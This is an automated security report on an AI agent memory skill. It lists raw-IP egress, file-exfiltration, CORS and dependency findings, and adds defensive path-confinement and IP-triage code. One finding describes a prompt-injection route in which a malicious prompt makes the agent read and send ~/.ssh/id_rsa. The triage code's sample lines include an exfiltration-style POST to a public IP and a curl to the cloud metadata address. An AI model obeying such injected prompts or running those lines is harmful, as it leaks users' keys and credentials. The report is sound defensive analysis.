Trust Assessment
agent-memory-improved received a trust score of 10/100, placing it in the Untrusted category. The skill has significant security findings that require attention before production use.
SkillShield's automated analysis identified 13 findings: 5 critical, 4 high, 4 medium and 0 low severity. Key findings include network egress to untrusted endpoints, a suspicious import of `requests`, and potential data exfiltration (a file read followed by a network send). All five critical findings are "HTTP request to raw IP address" hits in the client and setup scripts; since the LLM layer reports that the bundled service binds to 127.0.0.1, confirm whether each flagged address is the loopback address before treating it as external egress, because a call to a local service and a call to an external raw IP are different risks.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph and LLM Behavioral Safety. The Manifest Analysis layer scored lowest at 0/100.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (13)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls; remove connections to webhook collectors, paste sites and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client.py:22 |
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls; remove connections to webhook collectors, paste sites and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client_original.py:22 |
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls; remove connections to webhook collectors, paste sites and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/lucaspdude/persistent-private-agent-memory/scripts/setup.sh:41 |
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls; remove connections to webhook collectors, paste sites and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/lucaspdude/persistent-private-agent-memory/scripts/setup.sh:50 |
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls; remove connections to webhook collectors, paste sites and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/lucaspdude/persistent-private-agent-memory/scripts/start.sh:32 |
| HIGH | Potential data exfiltration (file read + network send): function `store_memory` reads files and sends data over the network, which may indicate data exfiltration. Review this function to ensure file contents are not sent to external servers. | Static | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client.py:121 |
| HIGH | Potential data exfiltration (file read + network send): function `store_memory` reads files and sends data over the network, which may indicate data exfiltration. Review this function to ensure file contents are not sent to external servers. | Static | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client_original.py:121 |
| HIGH | Arbitrary file read via user-controlled path in `store_memory`: the `store_memory` function in `scripts/memory_client.py` accepts a `--file` argument and reads whatever file the caller names. If an AI agent is prompted to store memory and a malicious prompt supplies a path to a sensitive file (e.g. `/etc/passwd`, `~/.ssh/id_rsa`), that file is read, base64-encoded and sent to the local memory service. Although the service is local, this is a data exfiltration risk from the agent's perspective, since the agent can be tricked into revealing local file contents. Implement strict validation or sandboxing for the `file_path` argument: only allow reads from a predefined safe directory, or require explicit user confirmation before reading from arbitrary paths. For an AI agent, this means ensuring the agent cannot be prompted into supplying arbitrary file paths. | LLM | scripts/memory_client.py:100 |
| HIGH | Unpinned dependencies in `scripts/setup.sh`: the script installs Python dependencies (`fastapi`, `uvicorn`, `cryptography`, `mnemonic`) without specifying exact versions. This is a supply chain risk, since a future malicious or vulnerable release of any of these packages could be installed and compromise the client environment. `assets/service/requirements.txt` pins versions for the service, but the `pip install` command in `setup.sh` does not use it for the client-side tools, nor when the service is installed via `setup.sh` directly. Pin all dependencies to specific versions (e.g. `fastapi==0.115.6`) in `scripts/setup.sh`, or have it install from a `requirements.txt` with pinned versions. | LLM | scripts/setup.sh:15 |
| MEDIUM | Suspicious import: `requests`. This module provides network access; verify the import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client.py:10 |
| MEDIUM | Suspicious import: `requests`. This module provides network access; verify the import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client_original.py:10 |
| MEDIUM | Sensitive environment variable access (`$HOME`): access to `$HOME` detected in a shell context. Verify this access is necessary and that the value is not exfiltrated. | Static | skills/lucaspdude/persistent-private-agent-memory/scripts/setup.sh:33 |
| MEDIUM | Overly permissive CORS policy in local service: the FastAPI service in `assets/service/main.py` configures `CORSMiddleware` with `allow_origins=["*"]`, all methods and all headers. The service is intended to run locally and bind to `127.0.0.1`, but this policy becomes a vulnerability if the service is ever exposed to the network, or if a malicious web page gets a browser to issue requests to `localhost`. It is an unnecessary relaxation even for a local-only service. Restrict `allow_origins` to specific known origins (e.g. `["http://localhost:8000"]` or `["http://127.0.0.1:8000"]`), or remove the middleware entirely if cross-origin requests are not expected. | LLM | assets/service/main.py:190 |
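The `store_memory` file-read finding recommends restricting the `--file` argument to a predefined safe directory. The block below is an added example of that check, written for this report and not taken from the skill's own `memory_client.py`; the memory directory, the `resolve_confined` and `read_memory_file` names and the 1 MiB size cap are assumptions. It resolves symlinks and `..` components before comparing against the allowed directory, so a symlink planted inside the memory directory that points at a key file is rejected along with plain traversal and absolute paths.

```python
"""Confine a user-supplied --file path to an allowed directory.

Added example for this report; not code from the
persistent-private-agent-memory skill. The directory layout, function
names and size cap are assumptions made for illustration.
"""
import base64
import os
import tempfile
from pathlib import Path


class UnsafePathError(ValueError):
    """Raised when a requested path escapes the allowed directory."""


def resolve_confined(file_path: str, base_dir: Path) -> Path:
    """Return the real path of file_path if it lies inside base_dir.

    Symlinks and '..' are resolved before the containment check, so a
    link inside base_dir that targets ~/.ssh/id_rsa is rejected just
    like a plain '../../etc/passwd' traversal.
    """
    base = base_dir.resolve(strict=True)
    # pathlib discards `base` when file_path is absolute, so absolute
    # inputs get exactly the same containment check after resolution.
    candidate = (base / file_path).resolve()
    try:
        inside = candidate.is_relative_to(base)  # Python 3.9+
    except AttributeError:  # older interpreters
        inside = os.path.commonpath([str(base), str(candidate)]) == str(base)
    if not inside:
        raise UnsafePathError(f"{file_path!r} resolves outside {base}")
    if not candidate.is_file():
        raise UnsafePathError(f"{file_path!r} is not a regular file")
    return candidate


def read_memory_file(file_path: str, base_dir: Path, max_bytes: int = 1 << 20) -> str:
    """Read a confined file and return it base64-encoded, capped in size."""
    path = resolve_confined(file_path, base_dir)
    data = path.read_bytes()
    if len(data) > max_bytes:
        raise UnsafePathError(f"{file_path!r} exceeds {max_bytes} bytes")
    return base64.b64encode(data).decode("ascii")


def demo() -> dict:
    """Constructed scenario: one allowed file plus traversal, absolute and symlink escapes."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        memdir = root / "memories"
        memdir.mkdir()
        (memdir / "note.txt").write_text("remember this")
        secret = root / "id_rsa"  # stands in for ~/.ssh/id_rsa
        secret.write_text("PRIVATE KEY")
        link = memdir / "innocent.txt"
        try:
            link.symlink_to(secret)
            have_symlink = True
        except OSError:  # symlink creation not permitted on this host
            have_symlink = False

        results["allowed"] = base64.b64decode(read_memory_file("note.txt", memdir)).decode()
        probes = {"traversal": "../id_rsa", "absolute": str(secret)}
        if have_symlink:
            probes["symlink"] = "innocent.txt"
        for label, p in probes.items():
            try:
                read_memory_file(p, memdir)
                results[label] = "read"
            except UnsafePathError:
                results[label] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
```

The containment check is done on the resolved path, not the string the caller passed, which is what defeats the symlink case; a check such as `".." not in file_path` would pass the symlink straight through.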
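All five CRITICAL findings are "HTTP request to raw IP address" hits, while the LLM-layer findings state that the bundled service binds to 127.0.0.1. The block below is an added triage helper, not part of SkillShield or of the skill, that finds IP-literal URLs in source lines and classifies each host as loopback, link-local, private or public with the standard library `ipaddress` module, so loopback-only calls can be downgraded while a public address or the 169.254.169.254 cloud metadata address keeps the scanner's rating. The sample lines are constructed for illustration and are not the skill's real source; the function names are assumptions.

```python
"""Triage 'HTTP request to raw IP address' findings by address class.

Added example for this report, not SkillShield's scanner and not code
from the skill under review. SAMPLE_LINES below are constructed; they
are not the contents of the skill's memory_client.py, setup.sh or start.sh.
"""
import ipaddress
import re
from typing import Dict, List, Tuple

# Matches http(s)://<host>[:port] where host is an IPv4 literal or a
# bracketed IPv6 literal. Hostnames are deliberately not matched: the
# finding being triaged is specifically about raw IP addresses.
_URL_RE = re.compile(
    r"https?://(?:(?P<v4>\d{1,3}(?:\.\d{1,3}){3})|\[(?P<v6>[0-9a-fA-F:]+)\])(?::\d+)?"
)


def classify_ip(host: str) -> str:
    """Map an IP literal to a triage bucket.

    loopback   -> traffic stays on this machine (a local service on 127.0.0.1 / ::1)
    link-local -> 169.254.0.0/16, which includes cloud metadata endpoints
    private    -> RFC 1918 / ULA ranges, reachable only on the local network
    public     -> routable address; treat as true external egress
    """
    ip = ipaddress.ip_address(host)
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:  # checked before is_private, which also covers 169.254/16
        return "link-local"
    if ip.is_private:
        return "private"
    return "public"


def triage(lines: List[Tuple[str, int, str]]) -> List[Dict[str, str]]:
    """For each (file, lineno, text) containing an IP-literal URL, emit a triage record.

    Only loopback egress is downgraded; every other class keeps the
    scanner's CRITICAL rating so a reviewer still has to look at it.
    """
    out: List[Dict[str, str]] = []
    for path, lineno, text in lines:
        for m in _URL_RE.finditer(text):
            host = m.group("v4") or m.group("v6")
            bucket = classify_ip(host)
            out.append({
                "location": f"{path}:{lineno}",
                "host": host,
                "bucket": bucket,
                "severity": "INFO" if bucket == "loopback" else "CRITICAL",
            })
    return out


# Constructed sample lines for illustration, not the skill's real source.
SAMPLE_LINES: List[Tuple[str, int, str]] = [
    ("scripts/memory_client.py", 22, 'BASE_URL = "http://127.0.0.1:8765"'),
    ("scripts/setup.sh", 41, "curl -fsS http://127.0.0.1:8765/health"),
    ("scripts/start.sh", 32, "curl -s http://[::1]:8765/health || true"),
    ("scripts/bad_example.py", 7, 'requests.post("http://8.8.8.8/collect", data=payload)'),
    ("scripts/bad_example.sh", 3, "curl http://169.254.169.254/latest/meta-data/"),
]


def summarize(lines: List[Tuple[str, int, str]] = SAMPLE_LINES) -> Dict[str, int]:
    """Count triage records by resulting severity."""
    counts: Dict[str, int] = {}
    for rec in triage(lines):
        counts[rec["severity"]] = counts.get(rec["severity"], 0) + 1
    return counts


if __name__ == "__main__":
    for rec in triage(SAMPLE_LINES):
        print(rec)
    print(summarize())
```

Downgrading loopback calls only removes the "raw IP" objection; the data-exfiltration findings against `store_memory` stand regardless of where the service listens, because the risk there is what the agent can be made to read, not where it sends it.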
Full report: https://skillshield.io/report/36e49acb68c446a1
Powered by SkillShield